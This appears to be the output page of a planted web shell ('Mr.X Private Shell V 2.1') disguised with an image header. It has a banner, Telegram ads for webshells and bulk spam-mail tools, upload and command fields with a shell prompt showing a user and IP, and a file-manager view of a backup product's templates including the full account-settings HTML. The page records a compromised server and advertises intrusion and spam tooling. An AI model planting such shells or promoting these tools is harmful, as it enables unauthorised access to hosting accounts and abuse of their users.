����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<div ng-controller="myAccount" class="controller-box">
    <h1>{{ lang.t("My Account") }}</h1>

    <div class='alert alert-warning' style="margin-top: 20px;" ng-show="encryptionKey">
        <div class='alert-message'>
            <strong class="alert-title" style="font-size: 20px;">{{lang.t("Your Backups Private Encryption Key")}}</strong>
            <div class="alert-body">
                <code>{{encryptionKey}}</code>
                <p>{{lang.t("PLEASE COPY THE KEY AND SAVE IT IN A SAFE PLACE. This key is required to restore data from backups, WITHOUT this key, encrypted data will be lost")}}</p>
            </div>
        </div>
    </div>
    
    <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">
            <div class="x_panel">
                <div class="x_content">
                    <br>
                    <form data-parsley-validate="" class="form-horizontal form-label-left" novalidate>
                        <div class="form-group">
                            <label class="control-label col-md-3 col-sm-3 col-xs-12" for="email">{{ lang.t("Email Address") }}</label>
                            <div class="col-md-6 col-sm-6 col-xs-12">
                                <input id="email" class="form-control col-md-7 col-xs-12" type="text" ng-model="saveData.email" value="" />
                                <p class="help-block">{{ lang.t("The client Email address for notifications. Leave empty to disable notifications") }}</p>
                            </div>
                        </div>
                        <!--div class="form-group" ng-show="perm.isRoot">
                            <label class="control-label col-md-3 col-sm-3 col-xs-12" >{{ lang.t("Reset Encryption Key") }}</label>
                            <div class="col-md-6 col-sm-6 col-xs-12">
                                <button type="button" ng-show="details.secret_key"  ng-click="resetEncryptionKey()" class="btn btn-primary" tooltip="GDPR Mode must first be enabled in order to reset an encryption key.">{{lang.t("Reset Now")}}</button>
                                <div ng-hide="details.secret_key">{{lang.t("No Encryption Key Found")}}</div>
                                <p class="help-block">{{ lang.t("PLEASE NOTE! Once you reset the account encryption key, ALL BACKUPS becomes inaccessible and will be deleted.") }}</p>
                            </div>
                        </div-->
                        <div ng-hide="details.login_only">
                            <div class="form-group" ng-show="info.encryption_selection == 1">
                                <label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Backup Type") }}</label>
                                <div class="col-md-6 col-sm-6 col-xs-12">
                                    <div>
                                        <div class="pretty p-default p-round p-smooth">
                                            <input type="radio" ng-model="saveData.backup_type" id="backup_type_0" ng-checked="saveData.backup_type == 0" value="0" />
                                            <div class="state p-primary"><label for="backup_type_0">{{ lang.t("Any Backups") }}</label></div>
                                        </div>
                                        <p class="help-block">{{lang.t("Your account will be backed up normally.")}}</p>
                                    </div>
                                    <div>
                                        <div class="pretty p-default p-round p-smooth">
                                            <input type="radio" ng-model="saveData.backup_type" id="backup_type_1" ng-checked="saveData.backup_type == 1" value="1" />
                                            <div class="state p-primary"><label for="backup_type_1">{{ lang.t("Only Encrypted Backups") }}</label></div>
                                        </div>
                                        <p class="help-block">{{lang.t("Your account will be backed up only on encrypted backup jobs, and will be excluded from any other backup jobs.")}}</p>
                                    </div>
                                    <div>
                                        <div class="pretty p-default p-round p-smooth">
                                            <input type="radio" ng-model="saveData.backup_type" id="backup_type_2" ng-checked="saveData.backup_type == 2" value="2" />
                                            <div class="state p-primary"><label for="backup_type_2">{{ lang.t("No Backups") }}</label></div>
                                        </div>
                                        <p class="help-block">{{lang.t("Your account will not be backed up at all.")}}</p>
                                    </div>
                                </div>
                            </div>
                            <div class="form-group" ng-show="info.encryption_selection == 1 && saveData.backup_type == 1">
                                <label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Encryption Key") }}</label>
                                <div class="col-md-6 col-sm-6 col-xs-12">
                                    <div>
                                        <div class="pretty p-default p-round p-smooth">
                                            <input type="radio" ng-model="saveData.encryption_key_type" id="encryption_key_type_0" ng-checked="saveData.encryption_key_type == 0" value="0" />
                                            <div class="state p-primary"><label for="encryption_key_type_0">{{ lang.t("Local Encryption Key") }}</label></div>
                                        </div>
                                        <p class="help-block">
                                            {{lang.t("This should be used if you trust your hosting provider with your encryption key. Your hosting provider will be able to access your backups and perform actions for you (restore from backups).")}}
                                        </p>
                                    </div>
                                    <div>
                                        <div class="pretty p-default p-round p-smooth">
                                            <input type="radio" ng-model="saveData.encryption_key_type" id="encryption_key_type_1" ng-checked="saveData.encryption_key_type == 1" value="1" />
                                            <div class="state p-primary"><label for="encryption_key_type_1">{{ lang.t("Remote Encryption Key Type") }}</label></div>
                                        </div>
                                        <p class="help-block">
                                            {{lang.t("This should be used if you *DON'T* trust your hosting provider with your encryption key. Your hosting provider will *NOT* be able to access your backups or perform any action for you (restore from backups) without having the key.")}}<br />
                                            {{lang.t("CAUTION: If your encryption key is LOST, you will not be able to restore the account backups to your account.")}}
                                        </p>
                                    </div>
                                </div>
                            </div>

                            <div class="form-group" ng-show="info.forgotten_ttl > 0">
                                <label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Privacy Options") }}</label>
                                <div class="col-md-6 col-sm-6 col-xs-12">
                                    <div>
                                        <div class="pretty p-default p-curve p-smooth">
                                            <input type="checkbox" ng-checked="saveData.privacy == 1" id="privacy" ng-click="saveData.privacy = (saveData.privacy ? 0 : 1)" />
                                            <div class="state p-primary"><label for="privacy">{{ lang.t("The Right To Be Forgotten") }}</label></div>
                                        </div>
                                        <p class="help-block">
                                            {{lang.t("If this option is enabled when your account is closed/terminated all data (including backups) related to your account will be permanently deleted within %s days (This time value is set by your hosting provider).", info.forgotten_ttl)}}<br />
                                        </p>
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class="ln_solid"></div>
                        <div class="form-group">
                            <div class="col-md-4 col-sm-4 col-xs-12 col-md-offset-3">
                                <div class="input-group" style="margin-top: 5px;" ng-show="requireEncryptionKey()" ng-disabled="saveing">
                                    <span class="input-group-addon ng-binding">{{lang.t("Encryption Key")}}</span>
                                    <input type="text" value="" class="form-control ng-valid ng-dirty ng-touched ng-empty" ng-model="currentEncryptionKey" placeholder="{{lang.t('Paste your private backup encryption key to continue')}}" title="{{lang.t('Past your private backup encryption key to continue')}}">
                                    <span class="input-group-btn">
                                        <button type="button" class="btn btn-primary" ng-click="saveChanges()">{{ lang.t("Save") }}</button>
                                    </span>
                                </div>
                                <button ng-hide="requireEncryptionKey()" type="button" class="btn btn-primary" ng-click="saveChanges()" ng-disabled="saveing">{{ lang.t("Save") }}</button>
                            </div>
                        </div>

                    </form>
                </div>
            </div>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
accountFilters Folder 0755
destinations Folder 0755
disasterRecovery Folder 0755
notifications Folder 0755
settings Folder 0755
support Folder 0755
404.htm File 692 B 0644
accountActions.htm File 1.21 KB 0644
accountBackups.htm File 18.06 KB 0644
accountBackupsDownloadSummary.htm File 2.86 KB 0644
accountBackupsLockSummary.htm File 1.44 KB 0644
accountBackupsRestoreSummary.htm File 8.97 KB 0644
accountBackupsUnlockSummary.htm File 648 B 0644
accountDownloads.htm File 3.71 KB 0644
accountDropdown.htm File 1.18 KB 0644
accountExcludeListSelection.htm File 2.59 KB 0644
accountFilterActions.htm File 495 B 0644
accountFilterGroupActions.htm File 498 B 0644
accountFilterGroupManage.htm File 1.52 KB 0644
accountFilterGroupManageFields.htm File 1.26 KB 0644
accountFilterGroupManagePopup.htm File 581 B 0644
accountFilterGroupSelection.htm File 1.25 KB 0644
accountFilterGroups.htm File 5.06 KB 0644
accountFilterManage.htm File 1.49 KB 0644
accountFilterManageFields.htm File 3.17 KB 0644
accountFilterManagePopup.htm File 565 B 0644
accountFilters.htm File 4.57 KB 0644
accountManage.htm File 8.49 KB 0644
accountOrphanActions.htm File 587 B 0644
accountPackagesSelection.htm File 992 B 0644
accountReassign.htm File 3.24 KB 0644
accountSelection.htm File 1.35 KB 0644
accounts.htm File 10.93 KB 0644
accountsOrphans.htm File 7.91 KB 0644
accountsSelection.htm File 1.06 KB 0644
addons.htm File 1.04 KB 0644
agreement.htm File 44.62 KB 0644
agreementPanel.htm File 2.01 KB 0644
alerts.htm File 5.28 KB 0644
backupJobActions.htm File 2.09 KB 0644
backupJobManage.htm File 29.23 KB 0644
backupJobs.htm File 10.26 KB 0644
backupJobsSelection.htm File 958 B 0644
backupLockSelection.htm File 1.27 KB 0644
cloneJobActions.htm File 1.93 KB 0644
cloneJobManage.htm File 22.33 KB 0644
cloneJobs.htm File 7.68 KB 0644
cloneJobsSelection.htm File 955 B 0644
confirm.htm File 535 B 0644
dashboard.htm File 29.3 KB 0644
destinationActions.htm File 4.04 KB 0644
destinationManage.htm File 10.9 KB 0644
destinations.htm File 10.59 KB 0644
destinationsSelection.htm File 1.08 KB 0644
disableUI.htm File 318 B 0644
disasterRecovery.htm File 2.58 KB 0644
downloads.htm File 5.9 KB 0644
encryptionKeySelection.htm File 1.03 KB 0644
extension.htm File 6.73 KB 0644
fileBrowse.htm File 4.93 KB 0644
fileManager.htm File 1.87 KB 0644
fileManagerDownload.htm File 840 B 0644
fileManagerPopup.htm File 424 B 0644
fileManagerRestore.htm File 1.03 KB 0644
fileManagerView.htm File 6.24 KB 0644
filePermissions.htm File 5.78 KB 0644
filePermissionsActions.htm File 503 B 0644
filePermissionsManage.htm File 6.45 KB 0644
hookActions.htm File 1.12 KB 0644
hookManage.htm File 14.09 KB 0644
hooks.htm File 5.94 KB 0644
license.htm File 1.71 KB 0644
listSelection.htm File 834 B 0644
logActions.htm File 1.24 KB 0644
logItemActions.htm File 616 B 0644
logItems.htm File 7.99 KB 0644
logViewer.htm File 1.64 KB 0644
login.htm File 5 B 0644
logs.htm File 7.02 KB 0644
main.htm File 9.06 KB 0644
modifyDatabasesExcludes.htm File 1.19 KB 0644
modifyMongoDBExcludes.htm File 1.04 KB 0644
modifyMySQLExcludes.htm File 1.03 KB 0644
modifyPostgreSQLExcludes.htm File 1.04 KB 0644
myAccount.htm File 9.88 KB 0644
packageActions.htm File 402 B 0644
packages.htm File 6.17 KB 0644
permissions.htm File 5.59 KB 0644
plugin.htm File 76 B 0644
pluginActions.htm File 1.43 KB 0644
pluginManage.htm File 5.3 KB 0644
plugins.htm File 1.48 KB 0644
queue.htm File 8.43 KB 0644
queueActions.htm File 815 B 0644
queueItemActions.htm File 464 B 0644
queueItems.htm File 8.97 KB 0644
queueLogViewer.htm File 1.71 KB 0644
queuePriorities.htm File 5.59 KB 0644
queuePriorityActions.htm File 927 B 0644
queuePriorityManage.htm File 7.1 KB 0644
repositories.htm File 3.44 KB 0644
repositoryActions.htm File 755 B 0644
repositoryManage.htm File 2.85 KB 0644
restore.htm File 1.19 KB 0644
restoreConditionActions.htm File 1.05 KB 0644
restoreConditionManage.htm File 2.22 KB 0644
restoreConditions.htm File 3.26 KB 0644
restoreDirectories.htm File 8.81 KB 0644
restoreDisasterRecovery.htm File 5.97 KB 0644
restoreMultiAccount.htm File 49.16 KB 0644
restoreSingle.htm File 14.48 KB 0644
restoreSingleAccount.htm File 1.95 KB 0644
scheduleActions.htm File 689 B 0644
scheduleManage.htm File 1.67 KB 0644
scheduleManageFields.htm File 5.99 KB 0644
scheduleManagePopup.htm File 670 B 0644
scheduleSelection.htm File 1.98 KB 0644
schedules.htm File 4.27 KB 0644
security.htm File 4.69 KB 0644
securityAvailablePlugins.htm File 737 B 0644
settings.htm File 2.12 KB 0644
showcase.htm File 640 B 0644
sideMenu.htm File 213 B 0644
support.htm File 2.59 KB 0644
tagActions.htm File 620 B 0644
tagManage.htm File 3.84 KB 0644
tags.htm File 4.13 KB 0644
tagsSelection.htm File 1.25 KB 0644